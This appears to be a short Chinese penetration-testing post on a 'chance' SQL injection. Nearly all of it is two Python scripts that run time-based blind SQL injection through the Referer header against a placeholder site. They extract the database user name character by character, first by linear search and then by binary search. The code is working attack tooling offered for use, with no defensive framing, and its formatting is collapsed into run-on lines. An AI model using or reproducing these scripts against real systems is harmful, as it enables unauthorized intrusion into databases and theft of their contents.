实战渗透|一次巧合偶然的sql注入

# -*- coding: utf-8 -*-import requests,timeurl="https://aBC.com.cn/aa/15432aa.html"result=""for i in range(1,50):for j in range(32,128):     headers={"Referer":"https://aBC.com.cn/aa/15432aa.html/'+if(ascii(substr(user(),{},1))={},sleep(5),0)+'".format(i,j),"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0","Host":"https://aBC.com.cn/aa/15432aa.html"                }    st=time.time()    requests.get(url,headers=headers)if time.time()-st >=5:      result+=chr(j)      print('database user name:',result)breakelse:pass

# -*- coding:utf-8 -*-import requests,timefrom requests import exceptions    url="https://aBC.com.cn/aa/15432aa.html"def main():        result=""for i in range(1, 20):            low = 32            high = 128#1111while low < high:                mid = int((low + high) / 2)#content = "user()"#sql = "https://https://aBC.com.cn/aa/'+if((ascii(substr(({content}),{i},1))<{mid}),sleep(5),0)+'"                headers={"Referer":"https://https://aBC.com.cn/aa/15432aa.html/'+if(ascii(substr(user(),{},1))<{},sleep(5),0)+'".format(i,mid),"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0","Host":"https://aBC.com.cn/aa/"                    }                st=time.time()                    requests.get(url,headers=headers)#2222if time.time()-st >5:                    high = midelse:                    low = mid + 1                print("low value {} and high value {}".format(low,high))#3333#跑出结果后，值的处理if low == high == 32:            print("[*] Result is: {}".format(result))break            result += chr(int((high + low - 1) / 2))            print("database user :{}".format(result))if __name__ == '__main__':        main()